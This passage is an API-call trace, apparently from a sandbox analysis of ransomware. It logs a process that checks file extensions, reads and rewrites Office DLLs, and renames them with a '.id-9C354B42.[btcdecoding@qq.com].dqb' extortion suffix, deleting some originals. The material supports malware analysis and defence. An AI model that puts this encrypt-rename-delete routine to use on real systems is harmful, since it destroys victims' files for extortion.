(lpString=".bz2") returned 4 [0054.754] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.754] lstrlenW (lpString=".7z") returned 3 [0054.754] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.755] lstrlenW (lpString=".dbf") returned 4 [0054.755] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.755] lstrlenW (lpString=".1cd") returned 4 [0054.755] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0054.755] lstrlenW (lpString=".jpg") returned 4 [0054.755] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.755] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.755] lstrlenW (lpString="MSOINTL.DLL") returned 11 [0054.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.755] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=2528128) returned 1 [0054.755] CloseHandle (hObject=0x208) returned 1 [0054.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll")) returned 0x20 [0054.756] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.756] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0054.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0054.756] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0x0) returned 1 [0054.757] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.757] ReadFile (in: hFile=0x208, lpBuffer=0x3650058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3650058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.781] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.781] ReadFile (in: hFile=0x208, lpBuffer=0x3690058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x3690058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0054.788] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b3fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0054.788] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc2c | out: lpNewFilePointer=0x0) returned 1 [0054.788] ReadFile (in: hFile=0x208, lpBuffer=0x36d0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b3fc38, lpOverlapped=0x0 | out: lpBuffer=0x36d0058*, lpNumberOfBytesRead=0x2b3fc38*=0x40000, lpOverlapped=0x0) returned 1 [0055.067] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.067] WriteFile (in: hFile=0x208, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2b3fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0055.085] SetEndOfFile (hFile=0x208) returned 1 [0055.650] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x3ff24f8 [0055.654] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.654] WriteFile (in: hFile=0x208, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.655] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xcdbd5, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.655] WriteFile (in: hFile=0x208, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.661] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x229380, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fc7c | out: lpNewFilePointer=0x0) returned 1 [0055.661] WriteFile (in: hFile=0x208, lpBuffer=0x3ff24f8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b3fc88, lpOverlapped=0x0 | out: lpBuffer=0x3ff24f8*, lpNumberOfBytesWritten=0x2b3fc88*=0x40000, lpOverlapped=0x0) returned 1 [0055.663] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ff24f8 | out: hHeap=0x570000) returned 1 [0055.663] CloseHandle (hObject=0x208) returned 1 [0055.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.664] lstrlenW (lpString=".doc") returned 4 [0055.664] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString=".docx") returned 5 [0055.664] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0055.664] lstrlenW (lpString=".pdf") returned 4 [0055.664] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString=".xls") returned 4 [0055.664] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString=".xlsx") returned 5 [0055.664] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0055.664] lstrlenW (lpString=".ppt") returned 4 [0055.664] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.664] lstrlenW (lpString=".zip") returned 4 [0055.664] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString=".rar") returned 4 [0055.664] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.664] lstrlenW (lpString=".bz2") returned 4 [0055.664] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.664] lstrlenW (lpString=".7z") returned 3 [0055.665] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString=".dbf") returned 4 [0055.665] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString=".1cd") returned 4 [0055.665] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString=".jpg") returned 4 [0055.665] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString=".doc") returned 4 [0055.665] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString=".docx") returned 5 [0055.665] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0055.665] lstrlenW (lpString=".pdf") returned 4 [0055.665] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString=".xls") returned 4 [0055.665] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString=".xlsx") returned 5 [0055.665] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0055.665] lstrlenW (lpString=".ppt") returned 4 [0055.665] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.665] lstrlenW (lpString=".zip") returned 4 [0055.665] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString=".rar") returned 4 [0055.665] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0055.665] lstrlenW (lpString=".bz2") returned 4 [0055.665] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0055.665] lstrlenW (lpString=".7z") returned 3 [0055.665] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0055.665] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.666] lstrlenW (lpString=".dbf") returned 4 [0055.666] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0055.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.666] lstrlenW (lpString=".1cd") returned 4 [0055.666] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0055.666] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 72 [0055.666] lstrlenW (lpString=".jpg") returned 4 [0055.666] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0055.666] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0055.666] lstrlenW (lpString="xlsrvintl.dll") returned 13 [0055.666] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.027] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=105344) returned 1 [0056.027] CloseHandle (hObject=0x230) returned 1 [0056.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 0x20 [0056.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.027] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.027] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.027] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0056.287] GetLastError () returned 0x0 [0056.287] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x19b80, lpOverlapped=0x0) returned 1 [0056.290] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x19b90, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x19b90, lpOverlapped=0x0) returned 1 [0056.293] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.293] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xee, lpOverlapped=0x0) returned 1 [0056.293] SetEndOfFile (hFile=0x154) returned 1 [0056.293] CloseHandle (hObject=0x154) returned 1 [0056.293] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.293] SetEndOfFile (hFile=0x230) returned 1 [0056.295] CloseHandle (hObject=0x230) returned 1 [0056.295] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.295] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\xlsrvintl.dll")) returned 1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.295] lstrlenW (lpString=".doc") returned 4 [0056.295] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.295] lstrlenW (lpString=".docx") returned 5 [0056.295] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0056.295] lstrlenW (lpString=".pdf") returned 4 [0056.295] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.295] lstrlenW (lpString=".xls") returned 4 [0056.295] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.295] lstrlenW (lpString=".xlsx") returned 5 [0056.295] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0056.295] lstrlenW (lpString=".ppt") returned 4 [0056.295] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.295] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".zip") returned 4 [0056.296] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".rar") returned 4 [0056.296] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".bz2") returned 4 [0056.296] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.296] lstrlenW (lpString=".7z") returned 3 [0056.296] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".dbf") returned 4 [0056.296] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".1cd") returned 4 [0056.296] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".jpg") returned 4 [0056.296] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".doc") returned 4 [0056.296] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".docx") returned 5 [0056.296] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1 [0056.296] lstrlenW (lpString=".pdf") returned 4 [0056.296] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".xls") returned 4 [0056.296] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString=".xlsx") returned 5 [0056.296] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1 [0056.296] lstrlenW (lpString=".ppt") returned 4 [0056.296] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0056.296] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.296] lstrlenW (lpString=".zip") returned 4 [0056.297] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0056.297] lstrlenW (lpString=".rar") returned 4 [0056.297] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0056.297] lstrlenW (lpString=".bz2") returned 4 [0056.297] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0056.297] lstrlenW (lpString=".7z") returned 3 [0056.297] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0056.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.297] lstrlenW (lpString=".dbf") returned 4 [0056.297] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0056.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.297] lstrlenW (lpString=".1cd") returned 4 [0056.297] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0056.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\xlsrvintl.dll") returned 74 [0056.297] lstrlenW (lpString=".jpg") returned 4 [0056.297] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0056.297] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0056.297] lstrlenW (lpString="ACEODDBS.DLL") returned 12 [0056.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.298] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x2b3ff1c | out: lpFileSize=0x2b3ff1c*=15800) returned 1 [0056.298] CloseHandle (hObject=0x230) returned 1 [0056.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 0x20 [0056.298] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0056.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.298] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.298] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0056.299] GetLastError () returned 0x0 [0056.299] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x3db8, lpOverlapped=0x0) returned 1 [0056.301] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0x3dc0, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0x3dc0, lpOverlapped=0x0) returned 1 [0056.302] ReadFile (in: hFile=0x230, lpBuffer=0x3650020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesRead=0x2b3fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.302] WriteFile (in: hFile=0x154, lpBuffer=0x3650020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3650020*, lpNumberOfBytesWritten=0x2b3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.302] SetEndOfFile (hFile=0x154) returned 1 [0056.302] CloseHandle (hObject=0x154) returned 1 [0056.303] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b3fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.303] SetEndOfFile (hFile=0x230) returned 1 [0056.303] CloseHandle (hObject=0x230) returned 1 [0056.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0056.304] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoddbs.dll")) returned 1 [0056.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.304] lstrlenW (lpString=".doc") returned 4 [0056.304] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString=".docx") returned 5 [0056.304] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0056.304] lstrlenW (lpString=".pdf") returned 4 [0056.304] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString=".xls") returned 4 [0056.304] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString=".xlsx") returned 5 [0056.304] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0056.304] lstrlenW (lpString=".ppt") returned 4 [0056.304] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.304] lstrlenW (lpString=".zip") returned 4 [0056.304] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString=".rar") returned 4 [0056.304] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.304] lstrlenW (lpString=".bz2") returned 4 [0056.304] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.305] lstrlenW (lpString=".7z") returned 3 [0056.305] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString=".dbf") returned 4 [0056.305] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEODDBS.DLL") returned 68 [0056.305] lstrlenW (lpString=".1cd") returned 4 [0056.305] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.305] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 